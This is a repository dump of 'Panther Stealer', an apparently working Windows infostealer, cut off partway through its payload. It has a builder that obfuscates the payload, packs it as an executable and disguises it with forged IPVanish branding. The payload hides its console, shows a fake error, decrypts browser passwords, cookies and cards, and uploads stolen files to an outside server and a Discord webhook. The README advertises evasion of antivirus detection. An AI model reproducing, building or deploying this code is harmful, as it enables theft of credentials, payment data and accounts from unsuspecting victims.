├── resources ├── icon │ ├── .gitkeep │ ├── 2rvfb-a8knz.ico │ ├── 4ry4u-t0qkm.ico │ ├── 6lmea-huxv2.ico │ ├── cl961-93b7h.ico │ ├── ffuze-uml3o.ico │ ├── nhi1f-a5c8z.ico │ ├── p71yp-q9w6s.ico │ ├── qc4m1-afanx.ico │ ├── s4h2u-13u4f.ico │ ├── s9lrt-9qfni.ico │ ├── v3w87-7bpes.ico │ └── xlgbe-sk0qy.ico └── version │ ├── .gitkeep │ └── version.json ├── .gitignore ├── package.json ├── README.md ├── index.mjs └── stealer.js /resources/icon/.gitkeep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /resources/version/.gitkeep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | pnpm-lock.yaml 2 | src/* 3 | resources/icons/* 4 | node_modules/ 5 | *.exe -------------------------------------------------------------------------------- /resources/icon/2rvfb-a8knz.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/2rvfb-a8knz.ico -------------------------------------------------------------------------------- /resources/icon/4ry4u-t0qkm.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/4ry4u-t0qkm.ico -------------------------------------------------------------------------------- /resources/icon/6lmea-huxv2.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/6lmea-huxv2.ico -------------------------------------------------------------------------------- /resources/icon/cl961-93b7h.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/cl961-93b7h.ico -------------------------------------------------------------------------------- /resources/icon/ffuze-uml3o.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/ffuze-uml3o.ico -------------------------------------------------------------------------------- /resources/icon/nhi1f-a5c8z.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/nhi1f-a5c8z.ico -------------------------------------------------------------------------------- /resources/icon/p71yp-q9w6s.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/p71yp-q9w6s.ico -------------------------------------------------------------------------------- /resources/icon/qc4m1-afanx.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/qc4m1-afanx.ico -------------------------------------------------------------------------------- /resources/icon/s4h2u-13u4f.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/s4h2u-13u4f.ico -------------------------------------------------------------------------------- /resources/icon/s9lrt-9qfni.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/s9lrt-9qfni.ico -------------------------------------------------------------------------------- /resources/icon/v3w87-7bpes.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/v3w87-7bpes.ico -------------------------------------------------------------------------------- /resources/icon/xlgbe-sk0qy.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PantherOwO/Panther-Stealer/HEAD/resources/icon/xlgbe-sk0qy.ico -------------------------------------------------------------------------------- /resources/version/version.json: -------------------------------------------------------------------------------- 1 | { 2 | "companyName": "IPVanish, a Ziff Davis company", 3 | "fileDescription": "IPVanish", 4 | "fileVersion": "4.2.6.358", 5 | "internalName": "IPVanish.exe", 6 | "legalCopyright": "© 2019-2024 IPVanish, a Ziff Davis company. All rights reserved.", 7 | "originalFileName": "IPVanish.exe", 8 | "productName": "IPVanish", 9 | "ProductVersion": "4.2.6.358-a2aa3817" 10 | } -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Finder", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1", 8 | "start": "cls && npm i -g pnpm && pnpm i" 9 | }, 10 | "keywords": [], 11 | "author": "", 12 | "license": "ISC", 13 | "dependencies": { 14 | "cfonts": "^3.3.0", 15 | "chalk": "^5.4.1", 16 | "form-data": "^4.0.2", 17 | "fs-extra": "^11.3.0", 18 | "got": "^14.4.7", 19 | "js-confuser": "^2.0.0", 20 | "readline-sync": "^1.4.10", 21 | "resedit-cli": "^2.0.1" 22 | }, 23 | "devDependencies": { 24 | "@yao-pkg/pkg": "^6.3.2", 25 | "punycode": "^2.3.1" 26 | } 27 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 |
4 | Panther Stealer 5 |

6 | 7 | ## Disclaimer 8 | 9 | > I am not responsible for any misuse of this tool. It was created solely for educational purposes and intended for research. 10 | 11 | ### Installation 12 | 13 | > Before starting, I need you to install [Visual Studio Installer](https://visualstudio.microsoft.com/pt-br/downloads/) and the Dashboard Development pack with C++. 14 | 15 | First Time Setup: 16 | 1. Install required dependencies: `npm start` 17 | This will install pnpm and other necessary packages. 18 | 19 | Building: 20 | 1. Create your stealer: `node index.mjs` 21 | 2. Follow the interactive prompts. 22 | 23 | ## 🆙 Updates 24 | 25 | ```css 26 | (01/08/2024) Complete update, adjusting bugs, detections. 27 | (09/08/2024) Resolved api issue. 28 | (17/08/2024) I made some changes to the stealer to get telegram/Steam and some performance tweaks. 29 | (06/09/2024) Removal of encryption and a minor adjustment in the build. 30 | (30/09/2024) Adjustment in the build and in the upload api. 31 | (09/04/2025) General adjustment and API update. 32 | ``` 33 | 34 | ## 🥬 Detection 35 | 36 | ```css 37 | (01/08/2024) At the moment there are no virus detections or false positives. 38 | (17/08/2024) No detection yet. 39 | (06/09/2024) Still nothing. 40 | (30/09/2024) It went from 8 detections to 0. 41 | (09/04/2025) No detection 42 | ``` 43 | 44 | ## 🍔 Stealer Invoices 45 | 46 | ```css 47 | Security & Protection 48 | ├─ 🔒 Anti-Flood System 49 | ├─ 🕶️ Hidden Terminal 50 | ├─ ⚠️ Custom Error Messages 51 | └─ 🌐 IP Information Collection 52 | 53 | Browser Data Extraction 54 | ├─ 🔑 Saved Passwords 55 | ├─ 🍪 Browser Cookies 56 | ├─ 💳 Credit Card Data 57 | └─ 📜 Browsing History 58 | ├─ Google Chrome 59 | ├─ Microsoft Edge 60 | ├─ Brave Browser 61 | ├─ Opera GX/Standard 62 | └─ Yandex Browser 63 | 64 | Gaming & Communication 65 | ├─ 🎮 Discord 66 | │ ├─ Account Tokens 67 | │ └─ 2FA Backup Codes 68 | ├─ 📱 Telegram 69 | │ ├─ Session Files 70 | │ └─ Cache Data 71 | ├─ 🎲 Steam 72 | │ └─ Local Data 73 | ├─ 🟦 Roblox 74 | │ └─ Cookie Session 75 | └─ ⛏️ Minecraft 76 | └─ Launcher Data 77 | ``` 78 | 79 | ## Build Information 80 | 81 | ```css 82 | Size & Performance 83 | - Final Size: ~60MB Compressed 84 | - Compression: GZip Algorithm 85 | - Memory Usage Optimized 86 | - Low CPU Usage 87 | 88 | Icon Customization 89 | - Choose from included icons 90 | - Generate random icon 91 | - Use your own .ico file 92 | - Support for ICO/PNG formats 93 | 94 | File Information Customization 95 | - Company Name 96 | - File Description 97 | - Product Name 98 | - Copyright Information 99 | - File Version 100 | - Product Version 101 | - Internal Name 102 | - Original Filename 103 | ``` 104 | 105 | 106 | ### Conclusion 107 | 108 | > If you encounter any issues, feel free to reach out to me on Telegram: [t.me/oppolar](https://t.me/oppolar). -------------------------------------------------------------------------------- /index.mjs: -------------------------------------------------------------------------------- 1 | console.clear() 2 | process.title = 'Build - Stealer' 3 | 4 | import fs from 'fs-extra' 5 | import cfonts from 'cfonts' 6 | import chalk from 'chalk' 7 | import formdata from 'form-data' 8 | import resedit from 'resedit-cli' 9 | 10 | const { readFileSync, readdirSync, readJSONSync, outputFileSync, removeSync } = fs 11 | import { join, dirname, basename } from 'path' 12 | import { fileURLToPath } from 'url' 13 | import { execSync } from 'child_process' 14 | import { question, keyInSelect } from 'readline-sync' 15 | import { got } from 'got' 16 | import { obfuscate } from 'js-confuser' 17 | import { exec } from '@yao-pkg/pkg' 18 | 19 | const __filename = fileURLToPath(import.meta.url) 20 | const __dirname = dirname(__filename) 21 | 22 | cfonts.say('Build', { 23 | font: 'block', 24 | align: 'center', 25 | colors: [ 26 | 'red', 27 | 'yellow', 28 | 'green', 29 | 'cyan', 30 | 'blue', 31 | 'magenta' 32 | ], 33 | background: 'transparent', 34 | letterSpacing: 1, 35 | lineHeight: 1, 36 | space: false, 37 | maxLength: '0' 38 | }) 39 | 40 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 41 | 42 | const webhook = question(chalk.bold.yellow('[?] Enter webhook: ')) 43 | 44 | if (!webhook || !webhook.includes('discord.com/api/webhooks')) { 45 | console.log(chalk.bold.red('[@] Webhook is invalid or has not been informed.')) 46 | process.exit(1) 47 | } 48 | 49 | try { 50 | console.log(chalk.bold.black('[#] Validating the webhook')) 51 | 52 | const { 53 | body 54 | } = await got({ 55 | responseType: 'json', 56 | throwHttpErrors: false, 57 | dnsCache: false, 58 | url: webhook, 59 | headers: { 60 | 'Content-Type': 'application/json' 61 | } 62 | }) 63 | 64 | const { 65 | token 66 | } = body || {} 67 | 68 | if (!token) { 69 | console.log(chalk.bold.red('[@] This webhook is invalid.')) 70 | process.exit(1) 71 | } else { 72 | console.log(chalk.bold.green('[$] The webhook is valid.')) 73 | 74 | } 75 | } catch (error) { 76 | console.log(chalk.bold.red('[@] An error occurred while validating the webhook.')) 77 | console.log(error) 78 | process.exit(1) 79 | } 80 | 81 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 82 | 83 | const nome = question(chalk.bold.yellow('[?] Enter exe name: ')) 84 | 85 | if (!nome) { 86 | console.log(chalk.bold.red('[!] You need to choose a name.')) 87 | process.exit(1) 88 | } 89 | 90 | console.log(chalk.bold.green('[$] Name selected successfully:', nome)) 91 | 92 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 93 | 94 | var useimage = question(chalk.bold.yellow('[?] Would you like to use an icon? (y/n): ')) 95 | 96 | if (useimage !== 'y' && useimage !== 'n') { 97 | console.log(chalk.bold.red('[@] Invalid option.')) 98 | process.exit(1) 99 | } 100 | 101 | if (useimage.includes('y')) { 102 | useimage = '' 103 | 104 | var imagens = readdirSync(join( 105 | 'resources', 106 | 'icon' 107 | )) 108 | 109 | if (!imagens.length) { 110 | imagens = question(chalk.bold.yellow('[!] You don\'t have icons, to add icons add them to the icons folder, would you like to generate a random one? (y/n): ')) 111 | 112 | if (imagens.includes('y')) { 113 | imagens = 'random' 114 | } 115 | } else { 116 | const pergunta = keyInSelect([ 117 | ...imagens, 118 | 'Random Icon' 119 | ], chalk.bold.yellow('[?] Select an icon: ')) 120 | 121 | if (imagens.length === pergunta) { 122 | imagens = 'random' 123 | } 124 | 125 | if (pergunta === -1) { 126 | imagens = '' 127 | } 128 | 129 | if (typeof imagens !== 'string' && pergunta !== -1) { 130 | imagens = join( 131 | 'resources', 132 | 'icon', 133 | imagens[pergunta] 134 | ) 135 | 136 | useimage = imagens 137 | } 138 | } 139 | 140 | if (imagens === 'random') { 141 | console.log(chalk.bold.black('[#] Generating a random image with pixlr.')) 142 | 143 | var { 144 | body 145 | } = await got({ 146 | responseType: 'json', 147 | throwHttpErrors: false, 148 | dnsCache: false, 149 | url: 'https://pixlr.com/api/image-generator/feeds/recent/1/', 150 | method: 'get', 151 | headers: { 152 | 'content-type': 'application/json' 153 | } 154 | }) 155 | 156 | const { 157 | docs 158 | } = body?.data || {} 159 | 160 | if (!docs || !docs.length) { 161 | console.log(chalk.bold.red('[@] Unable to get an image, the API appears to be down.')) 162 | process.exit(1) 163 | } else { 164 | console.log(chalk.bold.green('[$] Image obtained successfully.')) 165 | } 166 | 167 | var image = docs[Math.floor(Math.random() * docs.length)] 168 | image = image.images[0].preview 169 | 170 | console.log(chalk.bold.black('[#] Converting the image to ICO format.')) 171 | 172 | const form = new formdata() 173 | 174 | form.append('file', image) 175 | form.append('icontype', 1) 176 | form.append('imagesize[]', '16x16') 177 | form.append('imagesize[]', '32x32') 178 | form.append('imagesize[]', '48x48') 179 | form.append('imagesize[]', '64x64') 180 | form.append('imagesize[]', '128x128') 181 | form.append('customsize', '') 182 | form.append('code', 84000) 183 | form.append('targetformat', 'ico') 184 | form.append('filelocation', 'online') 185 | form.append('oAuthToken', '') 186 | form.append('legal', 'Our PHP programs can only be used in aconvert.com. We DO NOT allow using our PHP programs in any third-party websites, software or apps. We will report abuse to your server provider, Google Play and App store if illegal usage found!') 187 | 188 | var { 189 | body 190 | } = await got({ 191 | responseType: 'json', 192 | throwHttpErrors: false, 193 | dnsCache: false, 194 | url: 'https://s11.aconvert.com/convert/convert11.php', 195 | method: 'post', 196 | body: form, 197 | headers: { 198 | ...form.getHeaders(), 199 | Referer: 'https://www.aconvert.com/', 200 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 YaBrowser/25.2.0.0 Safari/537.36' 201 | } 202 | }) 203 | 204 | const { 205 | state, 206 | filename 207 | } = body || {} 208 | 209 | if (state !== 'SUCCESS') { 210 | console.log(chalk.bold.red('[@] Unable to convert image, conversion API appears to be down.')) 211 | process.exit(1) 212 | } else { 213 | console.log(chalk.bold.green('[$] Image converted to ICO successfully.')) 214 | } 215 | 216 | console.log(chalk.bold.black('[#] Saving the image.')) 217 | 218 | var { 219 | body 220 | } = await got({ 221 | responseType: 'buffer', 222 | throwHttpErrors: false, 223 | dnsCache: false, 224 | url: 'https://s11.aconvert.com/convert/p3r68-cdx67/' + filename + '-001.ico', 225 | method: 'get' 226 | }) 227 | 228 | imagens = join( 229 | 'resources', 230 | 'icon', 231 | filename + '.ico', 232 | ) 233 | 234 | try { 235 | outputFileSync(imagens, body) 236 | useimage = imagens 237 | 238 | console.log(chalk.bold.green('[$] Image saved successfully.')) 239 | } catch (error) { 240 | console.log(chalk.bold.red('[!] An error occurred while saving the image.')) 241 | console.log(error) 242 | process.exit(1) 243 | } 244 | } 245 | } else { 246 | useimage = '' 247 | } 248 | 249 | if (useimage) { 250 | console.log(chalk.bold.green('[$] Icon selected successfully:', basename(useimage))) 251 | } 252 | 253 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 254 | 255 | var fileinfo = question(chalk.bold.yellow('[?] Would you like to change the executable information? (y/n): ')) 256 | .includes('y') 257 | 258 | if (fileinfo) { 259 | const infons = readdirSync(join( 260 | 'resources', 261 | 'version' 262 | )).filter(file => file.endsWith('.json')) 263 | 264 | if (!infons.length) { 265 | fileinfo = question(chalk.bold.yellow('[?] You don\'t have a release configuration, do you want to create one ? (y/n): ')) 266 | .includes('y') 267 | 268 | if (fileinfo) { 269 | fileinfo = 'new' 270 | } 271 | } else { 272 | fileinfo = keyInSelect([ 273 | ...infons, 274 | 'Create a new' 275 | ], chalk.bold.cyan('[#] Select the version file you want to use: ')) 276 | 277 | if (fileinfo === -1) { 278 | fileinfo = false 279 | } else if (fileinfo === infons.length) { 280 | fileinfo = 'new' 281 | } else { 282 | fileinfo = readJSONSync(join( 283 | 'resources', 284 | 'version', 285 | infons[fileinfo] 286 | )) 287 | } 288 | } 289 | 290 | if (fileinfo === 'new') { 291 | console.log(chalk.bold.red(`\n[Disclaimer]\n 292 | - It is not mandatory to fill in all fields. 293 | - If you're not sure, just press ENTER to skip the field. 294 | - What is in parentheses is an example of what you can put.\n`)) 295 | 296 | var version = {} 297 | 298 | version.companyName = (question(chalk.bold.cyan('[1/8] Company name (IPVanish, a Ziff Davis company): '))) || '' 299 | version.fileDescription = (question(chalk.bold.cyan('[2/8] File Description (IPVanish): '))) || '' 300 | version.fileVersion = (question(chalk.bold.cyan('[3/8] File version (4.2.6.358): '))) || '' 301 | version.internalName = (question(chalk.bold.cyan('[4/8] Internal name (IPVanish.exe): '))) || '' 302 | version.legalCopyright = (question(chalk.bold.cyan('[5/8] Copyright (\xA9 2019-2024 IPVanish, a Ziff Davis company. All rights reserved.): '))) || '' 303 | version.originalFileName = (question(chalk.bold.cyan('[6/8] Original filename (IPVanish.exe): '))) || '' 304 | version.productName = (question(chalk.bold.cyan('[7/8] Product name (IPVanish): '))) || '' 305 | version.ProductVersion = (question(chalk.bold.cyan('[8/8] Product version (4.2.6.358-a2aa3817): '))) || '' 306 | 307 | fileinfo = version 308 | 309 | outputFileSync(join( 310 | 'resources', 311 | 'version', 312 | nome + '.json' 313 | ), JSON.stringify(version, null, 3)) 314 | } 315 | } 316 | 317 | if (fileinfo) { 318 | console.log(chalk.bold.green('[$] File information selected successfully.')) 319 | } 320 | 321 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 322 | 323 | console.log(chalk.bold.black('[#] Obfuscating the source.')) 324 | 325 | var src = readFileSync(join( 326 | 'stealer.js' 327 | ), 'utf-8') 328 | 329 | src = src.replace('*WEBHOOK*', webhook) 330 | 331 | const { 332 | code 333 | } = await obfuscate(src, { 334 | astScrambler: true, 335 | calculator: true, 336 | compact: true, 337 | controlFlowFlattening: true, 338 | customStringEncodings: false, 339 | deadCode: true, 340 | dispatcher: true, 341 | duplicateLiteralsRemoval: true, 342 | flatten: true, 343 | globalConcealing: true, 344 | hexadecimalNumbers: true, 345 | identifierGenerator: { 346 | chinese: 1, 347 | hexadecimal: 1, 348 | mangled: 1, 349 | number: 1, 350 | randomized: 1, 351 | zeroWidth: 1 352 | }, 353 | lock: {}, 354 | minify: true, 355 | movedDeclarations: true, 356 | objectExtraction: true, 357 | opaquePredicates: true, 358 | pack: false, 359 | preserveFunctionLength: true, 360 | preset: 'high', 361 | renameGlobals: true, 362 | renameLabels: true, 363 | renameVariables: true, 364 | rgf: true, 365 | shuffle: true, 366 | stringCompression: true, 367 | stringConcealing: true, 368 | stringEncoding: true, 369 | stringSplitting: true, 370 | target: 'node', 371 | variableMasking: true, 372 | verbose: false 373 | }) 374 | 375 | if (!code) { 376 | console.log(chalk.bold.red('[!] An error occurred while obfuscating the code.')) 377 | process.exit(1) 378 | } 379 | 380 | console.log(chalk.bold.green('[$] Source successfully obfuscated.')) 381 | 382 | try { 383 | console.log(chalk.bold.black('[#] Saving the obfuscated source.')) 384 | 385 | outputFileSync(join( 386 | 'src', 387 | nome + '.js' 388 | ), code, { 389 | recursive: true 390 | }) 391 | 392 | console.log(chalk.bold.green('[+] Obfuscated source saved successfully.')) 393 | } catch (error) { 394 | console.log(chalk.bold.red('[!] An error occurred while saving the obfuscated source.')) 395 | console.log(error) 396 | process.exit(1) 397 | } 398 | 399 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 400 | 401 | console.log(chalk.bold.black('[#] Preparing package.json.')) 402 | 403 | const $package = `{ 404 | "name": "${nome}", 405 | "version": "1.0", 406 | "description": "", 407 | "main": "${nome}.js", 408 | "bin": "${nome}.js", 409 | "type": "commonjs", 410 | "keywords": [], 411 | "author": "", 412 | "license": "ISC", 413 | "dependencies": { 414 | "@primno/dpapi": "^2.0.1", 415 | "adm-zip": "^0.5.16", 416 | "better-sqlite3": "^11.9.1", 417 | "big-integer": "^1.6.52", 418 | "discord-webhook-node": "^1.1.8", 419 | "fast-glob": "^3.3.3", 420 | "form-data": "^4.0.2", 421 | "fs-extra": "^11.3.0", 422 | "got": "^11.8.3", 423 | "koffi": "^2.10.1", 424 | "playwright": "^1.51.1" 425 | }, 426 | "pkg": { 427 | "assets": [ 428 | "./node_modules/@primno/dpapi/build/Release/dpapi.node", 429 | "./node_modules/adm-zip/**/*", 430 | "./node_modules/better-sqlite3/build/Release/better_sqlite3.node", 431 | "./node_modules/discord-webhook-node/**/*", 432 | "./node_modules/fast-glob/**/*", 433 | "./node_modules/form-data/**/*", 434 | "./node_modules/fs-extra/**/*", 435 | "./node_modules/got/**/*", 436 | "./node_modules/playwright/**/*" 437 | ], 438 | "scripts": [ 439 | "!./node_modules/playwright-core/lib/server/chromium/appIcon.png" 440 | ] 441 | }, 442 | "devDependencies": { 443 | "node-addon-api": "^8.3.1" 444 | } 445 | }` 446 | 447 | try { 448 | outputFileSync(join( 449 | 'src', 450 | 'package.json' 451 | ), $package) 452 | 453 | console.log(chalk.bold.green('[$] package.json created successfully.')) 454 | } catch (error) { 455 | console.log(chalk.bold.red('[!] An error occurred while creating package.json.')) 456 | console.log(error) 457 | process.exit(1) 458 | } 459 | 460 | try { 461 | console.log(chalk.bold.black('[#] Installing dependencies from package.json.')) 462 | 463 | execSync('cd src && pnpm i', { 464 | shell: false 465 | }) 466 | 467 | console.log(chalk.bold.green('[$] Dependencies installed successfully.')) 468 | } catch (error) { 469 | console.log(chalk.bold.red('[!] An error occurred while installing dependencies.')) 470 | console.log(error) 471 | process.exit(1) 472 | } 473 | 474 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 475 | 476 | try { 477 | console.log(chalk.bold.black('[#] Compiling module better-sqlite3, @primno/dpapi and koffi in version 20.')) 478 | 479 | execSync('cd src && cd node_modules/better-sqlite3 && npx node-gyp rebuild --target=20.0.0 && cd .. && cd @primno/dpapi && npx node-gyp rebuild --target=20.0.0 && cd ../../.. && pnpm add koffi', { 480 | shell: false, 481 | stdio: 'inherit' 482 | }) 483 | 484 | console.log(chalk.bold.green('[$] Modules compiled successfully to version 20.')) 485 | } catch (error) { 486 | console.log(chalk.bold.red('[!] An error occurred while compiling the modules.')) 487 | console.log(error) 488 | process.exit(1) 489 | } 490 | 491 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 492 | 493 | try { 494 | console.log(chalk.bold.black('[#] Creating the executable.')) 495 | 496 | await exec([ 497 | join(__dirname, 'src', nome + '.js'), 498 | '-C', 'GZip', 499 | '-t', 'node20-windows-x64', 500 | '-c', join(__dirname, 'src', 'package.json'), 501 | '-o', join(__dirname, nome + '.exe') 502 | ]) 503 | 504 | console.log(chalk.bold.green('[$] Executable created successfully.')) 505 | } catch (error) { 506 | console.log(chalk.bold.red('[!] An error occurred while creating the executable.')) 507 | console.log(error) 508 | process.exit(1) 509 | } 510 | 511 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 512 | 513 | if (useimage) { 514 | try { 515 | console.log(chalk.bold.black('[#] Changing executable information.')) 516 | 517 | await resedit({ 518 | 'in': `./${nome}.exe`, 519 | 'out': `./${nome}.exe`, 520 | 'definition': { 521 | 'version': fileinfo ? fileinfo : {}, 522 | 'icons': [{ 523 | 'id': 1, 524 | 'sourceFile': useimage 525 | }] 526 | } 527 | }) 528 | 529 | console.log(chalk.bold.green('[$] Executable information changed successfully.')) 530 | } catch (error) { 531 | console.log(chalk.bold.red('[!] An error occurred while changing the executable information.')) 532 | console.log(error) 533 | process.exit(1) 534 | } 535 | } 536 | 537 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 538 | 539 | process.on('exit', () => { 540 | try { 541 | console.log(chalk.bold.black('[#] Cleaning the build folder.')) 542 | removeSync(join(__dirname, 'src')) 543 | console.log(chalk.bold.green('[$] Build folder cleaned successfully.')) 544 | } catch (error) { 545 | console.log(chalk.bold.red('[!] Error cleaning the build folder.')) 546 | console.log(error) 547 | } 548 | }) -------------------------------------------------------------------------------- /stealer.js: -------------------------------------------------------------------------------- 1 | (async () => { 2 | const 3 | crypto = require('crypto'), 4 | glob = require('fast-glob'), 5 | sqlite3 = require('better-sqlite3'), 6 | zip = require('adm-zip'), 7 | got = require('got'), 8 | formdata = require('form-data'), 9 | koffi = require('koffi') 10 | 11 | const 12 | { readFileSync, readJSONSync, readdirSync, existsSync, outputFileSync, copySync, createReadStream, removeSync } = require('fs-extra'), 13 | { join, basename } = require('path'), 14 | { execSync, spawn } = require('child_process'), 15 | { chromium } = require('playwright'), 16 | { Dpapi } = require('@primno/dpapi'), 17 | { Webhook, MessageBuilder } = require('discord-webhook-node') 18 | 19 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 20 | 21 | const request = got.extend({ 22 | throwHttpErrors: false, 23 | dnsCache: false, 24 | https: { 25 | rejectUnauthorized: false 26 | } 27 | }) 28 | 29 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 30 | 31 | const phanter$upload = async (arquivo) => { 32 | try { 33 | const form = new formdata() 34 | form.append('file', createReadStream(arquivo), { 35 | filename: basename(arquivo) 36 | }) 37 | 38 | var { 39 | body 40 | } = await request({ 41 | responseType: 'json', 42 | url: 'https://api-panther.top/api/v1/upload', 43 | method: 'POST', 44 | body: form, 45 | headers: { 46 | ...form.getHeaders(), 47 | } 48 | }) 49 | 50 | const { 51 | status, 52 | data 53 | } = body || {} 54 | 55 | if (status !== 'success') { 56 | return false 57 | } 58 | 59 | return `https://api-panther.top/download/?id=${data}` 60 | } catch (error) { 61 | return false 62 | } 63 | } 64 | 65 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 66 | 67 | const kill = (nome) => { 68 | try { 69 | execSync(`taskkill /IM ${nome} /F /T`) 70 | return true 71 | } catch (error) { 72 | return false 73 | } 74 | } 75 | 76 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 77 | 78 | const $exe = (navegador) => { 79 | var basepath 80 | 81 | if (navegador === 'Chrome') { 82 | basepath = '\\Google\\Chrome\\Application\\chrome.exe' 83 | } else if (navegador === 'Edge') { 84 | basepath = '\\Microsoft\\Edge\\Application\\msedge.exe' 85 | } else if (navegador === 'YandexBrowser') { 86 | basepath = '\\Yandex\\YandexBrowser\\Application\\browser.exe' 87 | } else if (navegador === 'Brave-Browser') { 88 | basepath = '\\BraveSoftware\\Brave-Browser\\Application\\brave.exe' 89 | } else if (navegador === 'Opera Stable') { 90 | basepath = '\\Programs\\Opera\\opera.exe' 91 | } else if (navegador === 'Opera GX Stable') { 92 | basepath = '\\Programs\\Opera GX\\opera.exe' 93 | } else { 94 | return null 95 | } 96 | 97 | for (const vlaue of [ 98 | process.env.LOCALAPPDATA, 99 | process.env['ProgramFiles'], 100 | process.env['ProgramFiles(x86)'], 101 | ]) { 102 | var data = join(vlaue, basepath) 103 | if (existsSync(data)) { 104 | basepath = data 105 | break 106 | } 107 | } 108 | 109 | return basepath 110 | } 111 | 112 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 113 | 114 | const decrypt = (value, key) => { 115 | try { 116 | if (value.slice(0, 4).toString() === '0100') { 117 | const dec = Dpapi.unprotectData(value, null, 'CurrentUser') 118 | return dec 119 | } else { 120 | const iv = value.slice(3, 15) 121 | 122 | if (iv.length !== 12) { 123 | return false 124 | } 125 | 126 | const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv) 127 | decipher.setAuthTag(value.slice(-16)) 128 | const dec = decipher.update(value.slice(15, -16), 'base64', 'utf-8') + decipher.final('utf-8') 129 | return dec; 130 | } 131 | } catch (error) { 132 | console.log(error) 133 | return false 134 | } 135 | } 136 | 137 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 138 | 139 | const firstrun = join( 140 | process.env.TEMP, 141 | 'first-run', 142 | ) 143 | 144 | if (existsSync(firstrun)) { 145 | process.exit(1) 146 | } else { 147 | outputFileSync(firstrun, '1') 148 | } 149 | 150 | process.on('exit', () => { 151 | removeSync(firstrun) 152 | }) 153 | 154 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 155 | 156 | const hook = new Webhook({ 157 | url: '*WEBHOOK*', 158 | throwErrors: false, 159 | retryOnLimit: true 160 | }) 161 | 162 | hook.setAvatar('https://i.pinimg.com/736x/ac/59/99/ac5999ac36d68959393b9d2a4bd22322.jpg') 163 | hook.setUsername('Panther Stealer') 164 | 165 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 166 | 167 | const kuser = koffi.load('user32.dll') 168 | const kkcarnel = koffi.load('kernel32.dll') 169 | 170 | const showwindow = kuser.func('int ShowWindow(void* hWnd, int nCmdShow)') 171 | const parentwindow = kuser.func('void* GetParent(void* hWnd)') 172 | const getconsole = kkcarnel.func('void* GetConsoleWindow()') 173 | 174 | async function windowhandle() { 175 | const handle = getconsole() 176 | return parentwindow(handle) || handle 177 | } 178 | 179 | const handle = await windowhandle() 180 | 181 | if (handle) { 182 | showwindow(handle, 0) 183 | } 184 | 185 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 186 | 187 | spawn(`powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Ocorreu um erro no sistema!', 'Erro', [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Error)"`, { 188 | shell: true, 189 | detached: true, 190 | stdio: 'ignore', 191 | windowsHide: true 192 | }).unref() 193 | 194 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 195 | 196 | var temp = [ 197 | process.env.TEMP, 198 | process.env.USERPROFILE, 199 | process.env.TMP, 200 | process.env.PUBLIC, 201 | ] 202 | 203 | temp = temp[Math.floor(Math.random() * temp.length)] 204 | 205 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 206 | 207 | var meip 208 | var body 209 | 210 | try { 211 | meip = '✅' 212 | 213 | var { 214 | body 215 | } = await request({ 216 | responseType: 'json', 217 | url: 'https://ipwho.is/', 218 | method: 'GET', 219 | headers: { 220 | host: 'ipwho.is' 221 | } 222 | }) 223 | } catch (error) { 224 | console.log(error) 225 | meip = '❌' 226 | 227 | body = { 228 | success: false 229 | } 230 | } 231 | 232 | const { 233 | ip, 234 | type, 235 | continent, 236 | country, 237 | country_code, 238 | region_code, 239 | city, 240 | postal, 241 | success, 242 | connection 243 | } = body 244 | 245 | const { 246 | org 247 